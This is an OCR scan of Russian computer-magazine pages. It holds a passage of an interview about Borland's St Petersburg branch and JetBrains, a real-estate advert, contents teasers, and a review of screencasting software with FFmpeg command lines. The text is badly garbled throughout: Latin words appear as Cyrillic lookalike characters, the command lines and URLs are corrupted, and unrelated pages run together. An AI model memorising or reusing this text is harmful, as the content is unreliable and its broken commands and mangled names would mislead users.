инструментов для разработчика в более популяр- 
ные, с точки зрения аналитиков, области. 

В середине 90-х компания сменила на- 
звание на Іпргізе и чуть не закончила свое 
существование. Спасли ее инструменты разра- 
ботки — ОеІрЫ и позднее ЗВиіІсІег. Затем ВогІапсІ 
опять начала покупать компании — среди 
прочих в 2003 году так была куплена и аме- 
риканская компания ТодеіЬегБоІ'С основной 
центр разработки которой находился в Санкт- 
Петербурге. В результате этой покупки образо- 
вался российский филиал ВогІапсІ. 

Занимался питерский филиал вначале тем 
же, чем и до покупки, — продуктами линейки 
ТодеіЬег (для одновременной разработки кода 
и СІМЕ-диаграмм), а также интегрировал функ- 
циональность ТодеіЬег с продуктами ВогІапсІ. 

Постепенно американское руководство, до- 
вольное результатом работы питерских команд 
и их относительно низкой ценой, начало пере- 
водить в Питер разработку и других своих про- 
дуктов. К 2006 году практически все продукты 
ВогІапсІ имели команды в Питере. 

К сожалению, «переварить» эти покупки 
компания не смогла. Как и в случае с базами 
данных, возникла внутренняя конкуренция 
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Интервью с Андреем Ивановым 



МЫ ДАЕМ ЛЮДЯМ ВОЗМОЖНОСТЬ ЗАНИ- 
МАТЬСЯ НЕ ТОЛЬКО ПРОЕКТАМИ, НАД КО- 
ТОРЫМИ ОНИ РАБОТАЮТ БОЛЬШУЮ ЧАСТЬ 
ВРЕМЕНИ, НО И СТОРОННИМИ ВЕЩАМИ 



(ТодеіЬег Сопігоі Сепіег, например, была в том 
числе прямым конкурентом ^ВиіIсIег). С 2003 
по 2006 год, пока я работал в Вогіапб, компания 
пыталась наладить ситуацию, но она, к сожале- 
нию, ухудшалась. При этом высшее руководство, 
далекое от программирования и технологий, 
совершало ошибку за ошибкой, усугубляя 
и без того сложное положение. В компании 
процветала «политика», сильные программисты 
один за другим покидали компанию. В качестве 
основного средства решения проблем применя- 
лось сокращение расходов. 

Вогіапсі была компанией с достаточно 
высокой структурой. Была вертикаль от СЕО 
до программиста из, скажем, пяти менеджеров 
разного уровня, у которых было по одному под- 
чиненному. СЕО, СОО, зепіогѵісе ргезісІепС про- 
сто ѵісе ргезісІепС зепіог сіігесіог, сіігесіог, рго]есІ 
тападег, и уже у него три программиста. 

В 2006 году Вогіапсі начала сокращаться, 
и американцы поступили честно — в марте 
они сообщили нам, что филиал будет полностью 
закрыт к сентябрю. У руководства филиала было 
время на то, чтобы подготовить для людей от- 
ходные пути. 

Мы считали себя элитной компанией, подоб- 
ных которой в Питере нет. Поэтому мы не стали 
посылать людей на интервью куда-то в компа- 
нии, которых не было в городе, но попытались 
привезти эти новые компании к нам. Так мы 
привезли в Питер Соодіе и «Яндекс». 

Сначала нам удалось договориться 
о встрече с командой Соодіе, которая за- 
нималась созданием новых офисов. Удалось 
привезти их в Питер. Они проинтервьюиро- 
вали наших топ-инженеров и забрали к себе 
десяток самых сильных. Из них сделали Ооодіе 
Санкт-Петербург. Ребята и сейчас почти все там 
работают. 

Когда об этом узнал «Яндекс», первой 
реакцией было «мы тоже хотим». Для них тогда 
Ооодіе был как красная тряпка. Их планы были 
масштабнее: они были готовы открыть филиал 
на 40-50 человек, а не на 10. 

Передо мной лично встал выбор: Ооодіе 
или «Яндекс». Я выбрал последних и прорабо- 
тал там год-полтора. За это время мы сделали 
филиал, он заработал, но настала какая-то точка 
насыщения, после чего я решил «поиграть» 
в свой бизнес. 

Кстати, директора филиала там до сих 
пор нет. В тот момент, когда филиал появился 
и начал работать, оказалось, что руководитель 
там не нужен, они и так управлялись со всем 
нормально. 



ВМИРЕЮЕЙ 



Единственный элемент процесса, который сей- 
час присутствует в ^е^Вгаіп5, — это стандарт- 
ный 5ІапсІ-ир тееііпд. Команда раз в день 15-20 
минут общается и обсуждает текущее положение 
дел в проекте. Это пришло из подхода гибкой 
методологии разработки (Адііе). В остальном 
процесс поддерживается ІооГингом (программ- 
ными инструментами): есть постоянные сборки 
в Сопііпиоиз іпіедгаііоп, есть какие-то реег 
геѵіеѵѵ, когда люди смотрят, что они наделали. 

Если говорить математическим языком, 
для успешности компании есть необходимые 
и достаточные условия. 

Необходимые условия — это достаточный 
уровень зарплаты. У нас она высокая и по- 
стоянно индексируется. Полагаю, большую 
часть жизни в нашей компании люди не думают 
о зарплате, потому что она повышается до того, 
как они успевают об этом подумать. Но это недо- 
статочное условие, ведь существует множество 
компаний, которые платят большие деньги, 
но люди от них бегут. 

Достаточное условие — программистам 
должно быть интересно, они же люди твор- 
ческие. С одной стороны, это обеспечивается 
тем, что у нас в принципе интересные задачи 
(поскольку мы делаем программы для самих 
себя, а не, скажем, для банковских работников). 
Это круто, когда ты что-то сделал, а завтра сам 
же этим и пользуешься. Если у тебя не работает 
интеграция с ѵегзіоп сопігоі, ты пошел в сосед- 
нюю комнату, где сидит программист, вы вместе 
ее исправили — и все заработало. 

Если у человека возникает ощущение 
усталости, если ему надоело работать с какой-то 
определенной подсистемой, у нас есть возмож- 
ность внутреннего перехода. Если кому-то что-то 
надоедает или не складываются отношения 
с менеджером, человек не уходит наружу: 
он просто оказывается в другой команде, где 
зачастую «выстреливает» совершенно неожи- 
данным для себя, для нас и для предыдущего 
менеджера образом. 

Плюс существует такая вещь — 80/20 проект. 

Суть в том, что 20% рабочего времени — факти- 
чески день в неделю — сотрудник может тратить 
не на основной проект, а на что-то ему интерес- 
ное и полезное для компании. Это может быть 
разработка прототипа нового продукта компании, 
участие в Ореп Эоигсе проекте или преподавание. 

Работа в ^еШгаіп5 практически ничем 
не регламентируется. Офис действует 24 часа, 
всю неделю, так как у нас есть люди, которым 
комфортно работать по ночам. 



Ну... и кормим мы сотрудников хорошо, 
для кого-то это тоже важно :). Эту идею в свое 
время довольно активно рекламировала Соодіе. 
Мол, в офисе должно быть хорошее питание, 
и это очень важно. Они тогда даже своих по- 
варов заводили. Лично я не переоценивал бы 
эту штуку с едой, хотя среди студентов, говорят, 
очень популярная тема. 

Очень много людей, которые начинают 
работать в ^е(Вгаіп5, приходят из вузов. Есть 
несколько образовательных проектов, часть 
из которых в ^е^Вгаіп5 привел я, часть были 
изначально. Компания давно и удачно сотрудни- 
чает с кафедрой системного программирования 
матмеха СПбГУ. Получается, что если мы набира- 
ем 40 человек в год, то 20 из них будут из наших 
образовательных проектов. 

Типичная ошибка студентов — слишком 
рано начать работать. Существует много рабочих 
мест, требования к которым находятся на уров- 
не выпускника ПТУ. Велик соблазн: ко второ- 
му-третьему курсу появляется выбор — то ли 
сходить послушать лекцию по математике, то ли 
начать зарабатывать довольно приличные, если 
судить по общечеловеческим меркам, деньги. 
Студент, который пойдет по такому пути, сильно 
ограничивает свой набор возможностей. В том 
числе возможность зарабатывать в десятки раз 
больше. 

У нас в компании очень плоская структура. 
Есть два уровня управления. Это руководите- 
ли проектов, которые отвечают за конкретные 
продукты, и руководство компании — руководи- 
тели отделов, СТО, СОО, СЕО, которые отвечают 
за компанию в целом. 

Доступ к руководству компании у нас очень 
прост, и если у человека появляется какая-то 
идея, он может на следующее утро рассказать 
ее СЕО на кухне компании (ну или кому-то еще 
из руководства). Если идея действительно 
стоящая, то завтра же он сможет стать проджект- 
менеджером этого проекта и начать работу. 

Однако пытаться слишком рано залезть 
в менеджеры — ошибка. Поскольку эта про- 
фессия «незрелая», у меня есть ряд знакомых, 
которые работают в менеджменте и управлении 
просто потому, что этого хотели. 

Скажем, есть компания, где работает 50 
студентов. И один из них ходит и своему непо- 
средственному руководителю постоянно говорит: 
«Ой, а я так хочу быть менеджером!» Ну раз хо- 
чешь — будь. И люди начинают строить карьеру 
плохого менеджера, в плохой конторе, руководя 
плохими программистами, работающими над 
плохими задачами. 

Менеджер тоже профессия. Она другая, 
хотя и требует, в общем-то, похожего (но чуть 
иного) набора зкіііз. В нее лучше уходить, имея 
достаточный опыт работы программистом, точно 
осознавая, что тебе нужно. 

Если говорить о зарплатах, получается, 
что сетка техническая, в которой двигается 
программист, и сетка административная, в кото- 
рой человек движется, становясь менеджером... 
они совпадают. Можно быть хорошим програм- 
мистом и зарабатывать больше, чем плохой 
менеджер. 
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монолит 



ГРЫППП комппнии 



141006, Московская область, 
г. Мытищи, Олимпийский проспект, д. 48 

Тел.: (495) 660 96 31 , (495) 662 74 50, 
факс: (495) 660 96 41 
ѵѵѵѵѵѵ.дк-гтіопоІіТги ргіегті@дк-гтіопоІі1.ги 




ГК «Монолит» предлагает 



квартиры и нежилые 
помещения в городах 
ближнего Подмосковья 
Лобне, Королеве. 



ПРИОБРЕТАТЬ 
НЕ ПРОСТО ВЕЩИ, 
НО СТАТУС 



Самый красивый объект Группы компаний «Монолит» - 
Общественно-жилой комплекс «Статус», расположенный 
в г. Королев на одноименном проспекте. 



В центральной части многофункционального 
25-этажного монолитно-кирпичного комплекса 
размещаются квартиры для самых взыскательных 
новоселов. На каждой площадке располагается по 
четыре квартиры. С верхних этажей открывается 
панорамный вид на город и его окрестности. 
Балконы и лоджии в доме застеклены. 




по ВОПРОСАМ ПРИОБРЕТЕНИЯ КВАРТИР 

(«МОНОЛИТ НЕДВИЖИМОСТЬ») Г. МОСКВА, УЛ. БАУМАНСКАЯ, ДОМ 33/2, СТР. 1 



(495) 739-93-93 
(495) 967-65-57 








ГРУППА КОМПАНИЙ «МОНОЛИТ» - ОДНО 
из КРУПНЕЙШИХ ПРЕДПРИЯТИЙ-ЛИДЕРОВ 
МОСКОВСКОЙ ОБЛАСТИ, ДЕЙСТВУЮЩИХ 
НА СТРОИТЕЛЬНОМ РЫНКЕ С 1989 ГОДА 



Основным направлением деятельности Группы 
компаний «Монолит» является возведение жилых 
зданий и объектов социального назначения 
по индивидуальным проектам. В основе лежит 
технология монолитного домостроения. 




К “Статус”, 

X объектов 
.ак-топоіііш 



к услугам жителей комплекса и района супермаркет 
«Перекресток», МсОопаІсІз; Тапикі; Сбербанк, мага- 
зин для детей «Кораблик», салон красоты, фитнес 
центр «Спортив» и другие предприятия торговли 
и сферы обслуживания, расположенные на нижних 
этажах комплекса. Для желающих максимально 
приблизить место проживания к работе - офисы. 

Проектом предусмотрено строительство подземной 
и наземной автостоянок. Придомовая территория 
благоустроена и озеленена, сформирована зона для 
безопасного и комфортного отдыха жителей дома. 



ИПОТЕКА 

Группа «Монолит» активно 
работает с ведущими банка- 
ми по программам ипотеч- 
ного кредитования. Особое 
внимание уделяется право- 
вой защищенности клиентов, 
приобретателей жилья 
и нежилых помещений. 



ПО ВОПРОСАМ АРЕНДЫ ПОМЕЩЕНИЙ 
(ООО «МОНОЛИТ АРЕНДА») 



( 985 ) 727 - 57-62 



28 страница на одной полосе. 
Тизер некоторых статей. 



Ргеѵіе\л/ 



Х-МОВІЬЕ 
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АНДЕРДОГИ 

«Социальные сети и коммуникация», 
«продвинутая платформа для приложе- 
ний и мультимедиа», «НТМ15 и веб- 
приложения» — с этих слов начинаются 
презентации каждой новой мобильной 
ОС. Увы, с их помощью не удается убедить 
ни пользователей, ни разработчиков, 
ни представителей торговых сетей. Тем 
не менее Мее6о,ѵѵеЬ05 и многие другие, 
несомненно,оставятслед в истории — 
точнотакже, какоставили след«лузеры» 
времен гонки десктопов — такие как05/2 
или Ве05. Но мобильный рынок намного 
динамичнее, и, чтобы стать предметом 
ностальгии, новой ОС достаточно и полу- 
года. Поэтому рассказ о «новых лузерах» 
можно начинатьужесейчас. 




Х-МОВІЬЕ 



РС20МЕ 
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НАЧАЛО БОЛЬШОГО ПУТИ 

Если ты еще не догадался, про обустрой- 
ство АпсІгоісІ-смартфона можно говорить 
бесконечно. На этот раз, однако, речь 
пойдет не о приложениях, а о важных на- 
стройкахи возможностяхэтой ОС. 
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5СРЕЕНКАСТИНГ 

УоиТиЬе — это не только бесконечный 
поток котиков, но и отличный способ 
поведать мируо новых возможностях 
твоей софтины. Перед тобой обзор 
лучшихтулздлязаписи скринкастов! 
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НЕДОСТАЮЩЕЕЗВЕНО 

Если МасОЗХ кажется тебе непригодной 
для серьезной работы, ты просто не уме- 
ешь ее готовить. Для того чтобы получить 
все необходимое, нужно просто выбрать 
правильный пакетный менеджер. 



ВЗЛОМ 



МАШАРЕ 




1 — ■ 


БАНКОМАТ: ИСТОРИЯ БОЛЕЗНИ 




РОБОТ для ВЕБ2.0 




70 


Советуем бытьвнимательнейпередтем, 
как в следующий раз сунуть карточку 


74 


Удивительно, но в то время как веб- 
приложения становятся всесложнее. 


86 



взаветную щель, иначе сокращение АТМ инструменты для их аудита застряли 

можетобрестисовсемдругойсмысл. в позапрошлом десятилетии. 



МАЛВАРЬ ДЛЯ ПРОМАВТОМАТИКИ 

Благодаря Б^ихпеі приходится рассмо- 
три вать все бол ее экзотичные платфор- 
мы иустройства. На этотраз придется 
обратиться ктеме разнообразных АСУ. 
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Не говорите, что вас 





не предупреждали 



ту $50. 



і Любовь с первого включения. Мы не делаем замену для 

I Щ жёсткого диска. Мы делаем высокопроизводительные системы 

хранения данных, которые оставят вас в удивлении “33 □ ОС2, где 
ты пропадал всю прошлую жизнь?" Ведя за собой рынок в 
аспектах производительности, устойчивости и надёжности, серия 
880 Ѵеііех 4 - это родственная душа для ваших идеальных 
вычислительных впечатлений. Быстрые, более отзывчивые 
впечатления - те, что заново открывают вам производительность, 
продуктивность и ваш компьютер. Загрузитесь так быстро, как 
никогда раньше. 



Влюбитесь сегодня... 



Реклама 



ГІ&&|іЬ,ПІ 



ЕіЬіигІги 



Ыпирглг^се: 2,П 



ѴЕАЯ 



Увеличивает жизненный Наилучшая в 

цикл и надежность 380. индустрии гарантия. 






тЗЗТпГпГ 

ІПЮЛМЯРТ 






@іІоѵету55СІ | ѵѵѵѵѵѵ.ііоѵетуззсі.сопп | ѵѵѵѵѵѵ.осг.сот 




РС20ЫЕ 



Илья Муравьев (іііатгѵйуа.ги) 




Что такое скринкаст, ты знаешь не понаслышке. В злые минуты, когда изучае- 
мый язык программирования становится безжалостным, книга и диск с прилага- 
емым кодом не всегда спасают. Теория суха, а в скринкастах ты видишь на прак- 
тике последовательность написания кода, комментарии, результат. Будь это хоть 
суахили: действия на экране очень часто понятны без слов. Но есть в этой жизни 
занятия более интересные, чем просмотр скринкастов, — например, их созда- 
ние. Отличная новость: ни одна ОС не обделена софтом для записи скринкастов. 
Все плохие новости ты узнаешь, когда будешь читать обзор. 






СатЗІисІіо 



Домашняя страница: сатзіисііо.огд 
Поддержка платформ: ѴѴіпсІоѵѵз 
Лицензия: СРІ 

Предельно минималистичная по интерфейсу, 
но от этого не ограниченная функционально 
программа для скринкастинга. Для кого-то 
может быть весьма непривычно то, что все 
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настройки выставляются непосредственно 
в строках меню. С одной стороны, юзабилити 
в этом и не пахнет, но с другой — оыбчно на- 
стройки производятся для того, чтобы о них 
забыть в дальнейшем: запустил программу — 
записал — получил на выходе видео рабочего 
стола. СатЗіисІіо автоматом дает названия 
файлам и даже не спрашивает, в какую папку 
их сохранять (ты можешь указать соответству- 
ющий адрес в меню «Оігесіогу Ресогсііпд»). 

Эффектов немного, они имеют скорее 
служебное, а не визуальное назначение: до- 
бавление заголовков, временных отметок, во- 
дяного знака и тому подобное. Суровая тулза 
для записи программерских скринкастов. 

Запись видео возможна в полноэкранном 
режиме, фиксированная или с привязкой к окну 
приложения. Чтобы сделать паузу или оста- 



новить запись, лучше разобраться с горячими 
клавишами, чем потом вырезать «организа- 
ционные фрагменты» в видеоредакторе. Если 
не хочешь производить полноэкранную запись, 
используй опцию Аиіорап (автопанорамиро- 
вание). При ее активации СатЭіисІіо следит 
за курсором и записывает только нужный 
регион (нечто вроде 5таг1 Росиз в Сатіазіа). 
Соответственно, ты можешь здорово сэконо- 
мить на размере выходного файла. 

Доступны два варианта записи на лету — 
в АѴІ и 5РѴѴ, опционально можно подключить 
Ро55Іе55 Ѵісіео Собес (доступен на сайте). 

Видео можно сконвертировать в флеш уже 
по факту. 

Вердикт: бесплатная функциональная запись 
скринкаста без возможности дальнейшего 
монтажа. В итоге — движения курсора не выру- 
бишь и топором (в том числе по монитору). Если 
ты не любишь возиться с редактированием, де- 
лаешь все с первого дубля — это твой вариант. 



СатЗІисІіо — неудобно, 
но олдскульно 
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Зсгеепкастинг 



Сатіазіа Зіисііо 



Домашняя страница: із.дсІ/НЕЮз? 

Поддержка платформ: Мае 05, ѴѴіпсІоѵѵз 
Лицензия: Ігіаіѵѵаге 
При выборе софта ты должен понимать, 
что если ты остановишься на программе 
со скромными возможностями, которая 
делает только запись рабочего стола, то тебе 
не избежать последующего редактирования. 
Так что лучше: полноценный комбайн, вклю- 
чающий в себя весь функционал, или набор 
разрозненных утилит? Чтобы ответить на этот 
вопрос, попробуй поработать с Сатіазіа 
Зіисііо. Этот пакет позволяет создать скрин- 
каст, начиная с захвата видео и закачивая его 
публикацией на хостинге. 

Видео с десктопа можно записать утили- 
той РесогсІ ТооІ. Изначально запись произво- 
дится в контейнер формата сатгес (при же- 
лании ты можешь распаковать его и извлечь 
из содержимого АѴІ). Как вариант — записать 
в АѴІ с компрессией на лету. Но ты должен 
понимать, что идеальная запись из этого 
не получится. Хорошее сжатие видео требует 
пропорциональной нагрузки на системные ре- 
сурсы. Поэтому логичнее записать скринкаст 
с шустрым Іозеіезз-сжатием и затем не спеша 
подвергнуть сырой формат компрессии. 



Записанное видео можно отредактировать 
с точностью скальпеля в удобном редакторе 
Сатіазіа Зіисііо. Редактор студии пред- 
ставляет собой временную шкалу (Тітеііпе) 
с дорожками, на которых может быть видео 
с веб-камеры, слайды, музыка и прочий ат- 
мосферный звук вроде кликов мыши. 

Чтобы привлечь внимание к определен- 
ным моментам, можешь делать ремарки, 
увеличивать кадр. Кстати, обрати внимание 
на функцию ЗтагіРосиз («умный фокус»), 
которая сделает твой скринкаст более на- 
глядным и динамичным, акцентируя фокус 
на курсоре. Для этой фичи рекомендуется 
вести запись с запасом разрешения экрана, 
чтобы при увеличении изображение не теряло 
резкость. 

Применив настройки, можешь сохранить 
видео на зсгеепсавЕсопп или уоиІиЬе.сот 
прямо из интерфейса Сатіазіа. Для этого 
предусмотрен мастер сохранения Ргобисе 
& 5Ьаге. Выбор форматов видео — МР4, ѴѴМѴ, 
МОѴ, АѴІ, М4Ѵ, каждый из форматов поддает- 
ся гибкой настройке. МР4 можешь обернуть 
видео в НТМІб-оболочку и вставить на сайт. 

Цена у пакета соответствующая — 299 
долларов, лицензия для образовательных 




Монтаж в Сатіазіа Зіисііо 



целей (Ебисаііоп Ргісіпд) обойдется заметно 
дешевле — 179 долларов. Конечно, тебе будет 
сложно доказать, что инструкция по написа- 
нию кряка преследует сугубо образователь- 
ную цель, но попытка не пытка, не так ли? 

Вердикт: Сатіазіа — очень функциональный 
комбайн для записи и редактирования скрин- 
кастов, который, при умелом использовании 
временной шкалы и монтажного стола, позво- 
ляет смонтировать законченное художествен- 
ное произведение для рубрики «Взлом». 



РРтреа 



Домашняя страница: ^І^ппреа.огд 
Поддержка платформ: кроссплатформенная 
Лицензия: Е6РЕ 

Оба инструмента, о которых шла речь 
выше, — это графическая оболочка. Но согла- 
сись, было бы интересно приручить «зве- 
ря» в лице хорошо известного фреймворка 
РРтред. Преимущества ощутимы: РРтред 
содержит в себе набор библиотек ІіЬаѵсосІес, 
которыми грех не воспользоваться для скрин- 
кастерских нужд. 

Проблема в том, что РРтред не очень 
хорошо ладит с интерфейсом ОігесІзЬоѵѵ, 
в отличие от «иксов» в Ыпих, поэтому 
для ѴѴіпсІоѵѵз нам нужно установить «косты- 
ли». 

Первый вспомогательный компонент — 
Зегееп Саріиге Ресогбег, который содер- 
жит в себе набор утилит для захвата видео 
с рабочего стола. Скачать его можно здесь: 
із.дб/грРАХи . Второй компонент — Ѵігіиаі 
Аибіо Саріиге бгаЬЬег Оеѵісе — виртуальное 
устройство для захвата выходного аудио. Ска- 
чиваем: із.дб/ѵѵт05зб . Также для работы этих 
двух оболочек тебе нужно установить баѵа 
Рипііте Епѵігоптепі — актуальную версию 
найдешь здесь: із.дб/гіѴѴ9аТ . 

Настройки оболочки ищи в меню «Пуск» 
(или для ѴѴіпбоѵѵз 8: РгодгатОаІа\МісгозоЙ\ 
ѴѴіпбоѵѵз\5іагІ Мепи\Ргодгатз\5сгееп 
Саріигег Ресогбег\) в папке «Зегееп Саріигег 
Ресогбег». 



Консоль РРтред входит в состав Зегееп 
Саріигег Ресогбег и доступна по адресу 
Ргодгат РіІез\5сгееп Саріигег Ресогбег\ 
сопЯдигаІіоп_зеІир_иІіІіІу\ѵепбогѴі'тред\ 
ЫпѴі'тред.ехе. Далее мы запускаем РРтред 
из командной строки с нужными параметрами: 

-р-Ршре^ [внутренние опции] -і 

[внутренний файл] [внешние опции] 

[внешний файл] 

Применимо к Зегееп Саріигег Ресогбег 
в связке с Аибіо Саріиге СгаЬЬег Оеѵісе запуск 
записи происходит по команде 

-р-Ртре§ -Т бзііоы -і аибіо="ѵіг1;иа1-4-‘ 
аибіо-сар1;игег" : ѵібео="5сгееп-сар1;иге-4-■ 
гесогбег" -г 10 -д 1 0:\гесогб.тр4 




где -г и -д — это заданные параметры (фрейм- 
рейт и битрейт) для выходного видео. Все 
параметры описаны в документации РРтред: 
ЫРІѴА532ТЗ . 

Таким образом, получаем файл записи 
в указанном месте. Чтобы остановить запись, 
используй комбинацию клавиш <СігІ + С> 
в командной строке. Ты можешь создать Ьаі- 
файл, инструкция здесь: із.дб/РХггЬд . 

Вердикт: экспериментальное решение, 
работает по принципу «настроил и забыл», 
но настройка требует внимательного из- 



учения документации, если тебе потребуется 
записать область экрана с привязкой к окну 
приложения. 

Смотри также: 

• АРРСарІиге. із.дб/БтѴѴМгб 

• Лпд. ІесЬзтііЬ.сот/Ііпд.ЬітІ 

• ТірСат, цррц.сот 

• ВВ РІазЬВаск, із.дб/]дР4МЬ 

• НѵрегСат, Ьѵрегіопісз.сот/Ьс 

• Зегеепргеззо, зсгеепргеззо.сот 

• Вапбісат, Ьапбісат.сот 

• АсІіѵеРгезепІег, із.дб/ѵѵр9240 
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РС20ЫЕ 



Р-Рф-Р-ба => аусопу. 



Домашние страницы: 

Птред.огд, ІіЬаѵ.огд/аѵсопѵ.ЫтІ 

Поддержка платформ: кроссплатформенная 
Лицензия: 16Р1 

С РРтред в Ыпих дела обстоят гораздо проще. 
Изначально в пакет для УЬипІи модуль хІІдгаЬ 
входит в состав фреймворка, для других же 
дистрибутивов можно попробовать ключ 

--епаЫе-хІІ^гаЬ 

при компиляции. Далее производим установку: 

зисіо ар1;-§е1: іп5І;а11 -Р-Ртре§ 

Теперь в твоем распоряжении РРтред и тер- 
минал. Открываем справку із.дсІ/гпгБЬк и за- 
даем параметры записи с помощью запроса: 

-р-Ртре§ -Т х11§гаЬ -5 1280x800 -г 1 5 <-■ 

-і :0.0 -ѵсосіес д1:г1е шугесогсі .шоу 



где ключ -5 задает разрешение ролика, -г — 
количество кадров в секунду, -і — порядковый 
номер экрана «иксов». 

Совет: при кодировании можешь попробо- 
вать Іозеіезз-кодек Арріе Оиіскііте Апітаііоп 
(РІЕ). Он минимально нагружает систему и 
хорошо работает даже на вирутальной машине. 

Опять же, если тебя напрягает ручной ввод, 
вот скрипт, который вдобавок ко всему по- 
зволяет сделать запись с привязкой к опреде- 
ленному окну: із.дсІ/ЗпзОгІ . Как альтернативу 
используй утилиту РРсазІ для записи региона: 
із.дсІ/рЬМОеѵ . В качестве конвертера вместо 
РРтред сейчас нужно использовать аѵсопѵ. 
Документацию по граббингуты найдешь 
здесь: із.дб/ІШѵуЦз . 

Вердикт: удобный вариант записи с экрана 
через консоль при содействии библиотеки 
ІіЬаѵсосІес. 




Аѵсопѵ: процесс пошел! 

Смотри также: 

• хѵісісар, із.дсІ/8рѴѴЬ6Н 

• руѵпс2зѵѵС із.дсІ/ЬоиННН 

• ѴѴіпк. із.дсІ/гЬМхАи 

• Кагат, Ьирз://ІаипсЬрасІ.пеі/ка 2 ат 



иѵЗсгеепСатега 



Домашняя страница: із.дсІ/Логпе 
Поддержка платформ: ѴѴіпбоѵѵз 
Лицензия: зЬагеѵѵаге 
Скринкастинг-решение от отечественного 
производителя. Сочетает в себе некий баланс 
между минимализмом СатЗіисІіо и достаточ- 
но высокой ценой Сатіазіа Зіисііо. 

Что из существенного предлагает 
СІѴВсгеепСатега? В довесок к удобной на- 
страиваемой записи — покадровый редактор 
видео, который, мягко говоря, напоминает 
АбоЬе РІазЬ одной из старых версий. И это 
является несомненным плюсом: поддержива- 
ются слои с возможностью импорта/экспорта 
мультимедиа, наложения зума, аннотаций. 
Для пущего удобства видео можно разбить 
на эпизоды (см. вкладку «Разбиение на сег- 
менты»). 

Популярных форматов видео для сохране- 
ния не так уж много (РРѴ, АѴІ). Однако помимо 
них есть интересные варианты экспорта: 
защищенный от копирования исполняемый 



файл, 5ѴѴР, 6ІР, СІѴР. Хитрость в том, что 
в бесплатной версии ОѴЗсгеепСатега до- 
ступен для сохранения только экзотический 
ОѴР (формат, который запрашивает для вос- 
произведения отдельный плеер) и ЕХЕ, что 
в обоих случаях не позволит опубликовать 
ролик на видеохостинге. ЕХЕ-формат очень 
практичен тем, что с ним поставляется легко- 
весный плеер. Вдобавок можешь создать 
интерактивное видео в ЕХЕ или флеше, 
по нажатию на кнопку доступна навигация 
в определенную область видео. 

Реализована возможность записывать 
из нескольких источников аудио одновре- 
менно (впрочем, ты по старинке можешь про- 
должать пользоваться стереомикшером или 
устройством ѵѵЬаІ-уои-Ьеаг твоей звуковой 
карты). Можно делать пометки, надписи, 
рисовать. 

Скорость работы порадовала: редактор 
очень быстр, интерфейс реагирует на дей- 
ствия мгновенно. Даже при записи на лету 




Редактор видео в ІІѴЗсгеепСатега 

нет неприятных вибраций курсора и подви- 
саний. 

Вердикт: программа для записи скринкастов 
и их полноценного редактирования, приятно 
удивляющая своей скоростью и возможно- 
стями при относительно невысокой цене. 



КОДИРОВАНИЕ КАК РЕШЕНИЕ ПРОБЛЕМ 



Как уже говорилось, ты можешь записать видео в Іозеіезз, а затем 
использовать кодер для пакетной конвертации. Зачастую программы 
для записи скринкастов не предоставляют доступ к командной строке либо 
открывают малую часть настроектого или иного кодека. Я рекомендую 
утилиту НапсІВгаке ( ЬапсІЬгаке.^г ). которая предлагает пресеты и профили 
для медиаустройств плюс отличную документацию и заточенность под 
стандарт Н.264. Что касается Ііпих, то здесь могу посоветовать Мепсосіег — 
кодировщик видео, который входит в состав проекта МРІауег ( із.дсі/ихесир і. 



Оптимальные настройки скринкаста 

• Разрешение:от1024х768рхдо1280х 1024рх(720р). 

• Медиаконтейнер: МР4,М4Ѵ, РРѴ, МОѴ 

• Кодек: Н.264 

• Битрейт:500кЬр5ѴВР 

• Частота кадров: Ю-ЗО^рз 

• Аудио: ААС48000 128 кЬрзВіегеоѴВР 

• Цветопередача: 16-ЬіІ 
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Зсгеепкастинг 



В ЗЛЫЕ МИНУТЫ, КОГДА ИЗУЧАЕМЫЙ ЯЗЫК ПРОГРАММИРОВАНИЯ 
СТАНОВИТСЯ БЕЗЖАЛОСТНЫМ, КНИГА И ДИСК С ПРИЛАГАЕМЫМ 
КОДОМ НЕ ВСЕГДА СПАСАЮТ 



ѴІС 



Домашняя страница: ѵісіеоіап.огд/ѵіс 
Поддержка платформ: кроссплатформенная 
Лицензия: СРІ 2 

ѴІС тесііа ріауег — универсальный способ 
записи видео рабочего стола как в ѴѴіпсІоѵѵз, 
так и в Ыпих и Мае 05. Вся хитрость на- 
стройки — в выборе правильного устройства 
для захвата. 

Настройка осуществляется через меню 
«Месііа ^ Зігеат... ^ Саріиге Оеѵісе» (либо 
«Источник ^ Открыть устройство захва- 
та...» в локализации). В ѴѴіпсІоѵѵз в качестве 
источников выставляем «зсгееп-саріиге- 
гесогбег» и «ѵігіиаі-аибіо-саріигег», которые 
являются связующим мостиком с ОігесіЗЬоѵѵ 



и устанавливаются отдельно. В Ыпих вы- 
ставляем режим захвата Оізріау (Экран). 
Далее нажимаем «Сопѵегі», выбираем про- 
филь для сохранения видео и жмем «5іагЬ> 
для начала и «5іор» для остановки процесса 
записи. 

ѴІС действительно позволяет гибко 
настроить популярный кодировщик Н.264, 
запись аудио, вдобавок содержит множество 
предустановок. 

Вердикт: оказывается, что и плеер можно 
использовать для скринкастинга, ктомуже 
ѴІС располагает достаточно широкими воз- 
можностями по настройке кодирования. 




Выбор источника захвата в ѴІС тесііа ріауег 



ЯесогсШМоѵѵ 



Домашняя страница: 

Поддержка платформ: Ыпих 
Лицензия: СРІ 2 

Пожалуй, самыми популярными СІЛ-решениями 
для скринкастинга в среде Ыпих можно назвать 
гесогбМуОезкІор ( із.дб/ѵКупЕѴѴ ) и ІзІапЬиІ (і^ 
аб/СЭСпіпР ). К сожалению, минимализм обеих 
программ и ихустаревший функционал застав- 
ляют отказаться от их использования. 

РесогбІШоѵѵ — плагин для КОЕ, одна из наи- 
более вменяемыхутилит для Ыпих, имеющая 
графическую оболочку. 



Вроде бы функционал стандартный для та- 
кого рода программ, однако сильная сторона 
РесогбКМоѵѵ заключается в том, что ты без про- 
блем можешь выставить РРтред для записи 
и задать параметрами командной строки опции 
кодирования видео. Из других удобств — воз- 
можность сохранения пресетов разрешения 
и зум. Готовую запись в несколько щелчков 
можно загрузить на Ыір.іѵ или уоиІиЬе.сот. 

Вердикт: одна из лучших оболочек для скрин- 
кастинга в Ыпих с возможностью гибкого 
управления параметрами РРтред. 




РесогеШМоѵѵ: настройка кодирования 



ЧЕМ РЕДАКТИРОВАТЬ ВИДЕО И АУДИО 



Ѵіг«иаІОиЬ 

ѵігІиаІбиЬ.огд 

Редактор с огромным количеством 
поддерживаемых форматов, 
фильтров и модулей, неплохо 
оптимизирован под железо. 
Единственный минус — звук в нем 
не отредактируешь. Плюс, если 
тебе нужно всего лишь выполнить 
простенькие задачи, ѴігІиаЮиЬ 
отпугнет своим интерфейсом 
без намеков на бгад & бгор. 



ОрепЗЬоІ 

